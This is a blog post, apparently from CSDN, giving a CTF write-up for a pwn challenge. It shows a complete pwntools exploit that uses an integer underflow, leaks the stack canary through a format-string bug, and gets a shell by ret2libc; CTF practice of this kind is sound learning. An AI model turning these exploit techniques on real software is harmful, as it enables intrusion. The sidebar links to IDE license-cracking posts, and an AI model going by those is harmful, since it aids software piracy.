idea-pwn

最新推荐文章于 2024-09-23 18:22:38 发布
最新推荐文章于 2024-09-23 18:22:38 发布
阅读量363 收藏 7
点赞数 4
文章标签: intellij-idea java ide
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81899310/article/details/142303972
版权

拿到题目除了给了ELF以外,还给出了一个libc文件,所以我拿到手的第一直觉就是ret2libc.还是检查一下的保护。

开启了canary和NX,接着把它丢进ida里,看一下函数逻辑

主函数里只有一个vuln函数,我们跟进发现先是由一个get_n()来限制我们读入字符的长度,如果长度没有超过32我们就会进入到gift函数里,继续跟进gift函数

我们首先会生成一个canary把它赋值给v2,然后会读入6个字符,后面紧接着一个printf函数,看到这里可以很明显发现这里会有一个格式化字符串的漏洞。既然我已经判断题目是ret2libc,那我肯定是需要借助漏洞来找到libc的基地址,我此时就想,那我可不可以利用格式化字符串的漏洞找出已经执行过的函数的真实地址,进而找出libc的基地址呢?

但是就算我成功了,我找到了system函数和/bin/sh的真实地址,我也需要通过栈溢出的手段把它们写入栈上才获取shell。所以我肯定是需要找到可以进行栈溢出的地方才能接着做下去,并且因为该程序是开启了canary保护的,我肯定还是要想办法进行绕过才可以。

此时的gift函数是不足以支撑我们进行栈溢出操作的,并且在左侧函数栏也没有发现其他可以利用的函数。

所以我再次回到vuln函数,还是刚刚的get_n,通过下方的if语句,它只是限制了v1不能超过32,但是如果我输入-1呢?对啊v1是一个无符号整数,我如果输入-1的话,它会直接实现下溢。由-1变成0xffffffff。这样我就可以实现向栈中输入超长的数据,进而篡改返回地址,实现ret2libc。但是其实还有一个问题,它开启了canary保护,我需要对canary进行绕过。对啊对啊格式化字符串漏洞是可以泄露出canary的值的。所以现在思路明确了,我需要输入-1绕过get_n,并通过格式化字符串漏洞找出canary的值,进而实现返回地址的覆盖获取shell.

先找偏移,经过反复尝试,我们输入的数据相对于栈的偏移是5

 

通过gdb调试,可以发现eax寄存器中存着canary的值,且这个值位于我们输入数据的下两行

所以可以利用%7$p,继续步过到getchar,看一下canary和我们输入数据的偏移

0x4c-0x2c=0x20,这是我们输入数据距离canary的值,0x58-0x4c=0xc,这是canary距离栈顶的值。可以直接写出第一段payload了。

from pwn import *
context.log_level='debug'
e = ELF('./idea')
libc = ELF('libc-2.23.so')
p = process('./idea')
puts_got = e.got['puts']
puts_plt = e.plt['puts']
start_addr = 0x804870d
p.recv()
pay = b'-1'
p.sendline(pay)
p.recvuntil(b'gift!\n')
pay = b'%7$p'
p.sendline(pay)
canary = int(p.recv()[2:10],16)
print('canary:',hex(canary))
payload = b'a' * 0x20 + p32(canary) + b'a' * 0xc + p32(puts_plt) + p32(start_addr) + p32(puts_got)
p.sendline(payload)

此时可以直接获取puts函数的真实地址,剩下的就是ret2libc,计算libc的基地址,找到system和/bin/sh的地址,获取shell

p.recvuntil(b'aaaa\n')
addr = u32(p.recv(4))
print('puts:',hex(addr))
libc_base = addr - libc.sym['puts']
print('libc_base:',hex(libc_base))
system = libc_base + libc.sym['system']
print('system:',hex(system))
binsh = libc_base + next(libc.search(b'/bin/sh'))
payload = b'a' * 0x20 + p32(canary) + b'a' * 0xc + p32(system) + p32(0) + p32(binsh)
p.sendline(b'-1')
p.sendline(b'111111')
p.sendline(payload)

p.interactive()

换了libc之后成功打通啦

记录一下利用pwnchelf换libc

patchelf —set-interpreter ld路径 —set-rpath ld的上一级路径 文件名

igiohhh
关注
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
免费获取 IntelliJ IDEA 激活码的 7 种方式(2024 最新版)
Java技术栈,分享最主流的Java技术
01-08 4万+
本文总结了免费获取 IntelliJ IDEA 的 7 种方式,通过学生、老师、教育机构、开源项目、社区活动、组织团队等都可以获取到免费激活码。看完一圈是不是觉得没一个能适合自己,还是有办法的,在国内想申请正版激活码,最简单的方式是维护一个简单的开源项目,其次就是通过教育邮箱了。如果以上都不允许,也不想折腾,经济条件允许情况下入手一款正版的也是很香的,时间也是金钱,不用浪费时间找激活码那,关键时刻掉链子也很要命。最后,如果觉得有收获,分享给你的朋友们吧~本文系公众号 "Java技术栈。
2024年最新ideIDE系列激活(持续更新)
Hello_css的博客
07-10 3万+
如果看到显示过期了的话,
IDEA官方激活码获取教程及常用命令
欢迎阅读程序猿小张的博客~
03-15 6万+
1.说明: 仅适用于学生群体 一年激活权限 2.申请过程: 官方申请网址点击Apply now按照流程一步步申请即可 没有校园个人邮箱的可以使用官方文件,然后上传学信网的成绩单或者学生证即可 3 已经参加工作的同学也可以立即获取最新激活码 ............
2024年idea和IntelliJ系列激活码(持续更新)
码农code之路
08-11 6万+
如果是过期了的话,
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
IDEA2023的激活与安装(全网最靠谱,最快捷的方式)
热门推荐
weixin_50737119的博客
01-16 15万+
全网最快捷,最方便,最详细的IDEA破解方式
2023最省心的IDEA激活方式
jetereting的博客
07-16 2万+
idea激活,适用于JetBrains全系列软件所有新老版本,如:IntelliJ IDEA、AppCode、CLion、DataGrip、GoLand、PhpStorm、PyCharm、Rider、RubyMine、WebStorm,当然也适用Windows/Mac/Linux平台。 此激活方法支持登录账号,支持在线更新,支持跨平台,支持最新版(正版激活)。
2024年最新IDE激活码 | 自动获取
Java 架构师之路
08-31 1万+
如果是过期了的话,
2024年最新IDE激活码 | 免费获取
lxw1844912514的博客
02-04 2万+
1.点击上方蓝色「码农编程进阶笔记」公众号,聊天框发送【激活码】关键字,获取最新全家桶激活码2.复制百度盘链接在电脑端浏览器打开3.CTRL+A 全选复制激活码到IDEA中,即可4.累计为 3W+ 编程小伙伴提供激活码帮助,亲测可行限时7天,如遇失效,请及时联系我更新:> > 联系我 < <欢迎分享给需要的朋友,求一键三连:分享朋友圈、点赞、在看...
IntelliJ IDEA2021激活码(在校学生)
qq_57570052的博客
07-07 9188
点击Apply now按照流程一步步申请即可,没有校园个人邮箱的可以使用官方文件,然后上传学信网的成绩单或者学生证即可。
2024年最新的IDEA (亲测有效)Activation Code!
最新发布
m0_74375806的博客
09-23 6195
如果后面这个激活码失效了,可以评论一下吗,这样其他人就可以不用试啦!希望能和大家一起分享!9月22日在网上找了挺多,试出来这个可以!
Java开发环境搭建系列----IDEA开发工具安装
nvkdnx的博客
03-02 1024
IDEA软件安装
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值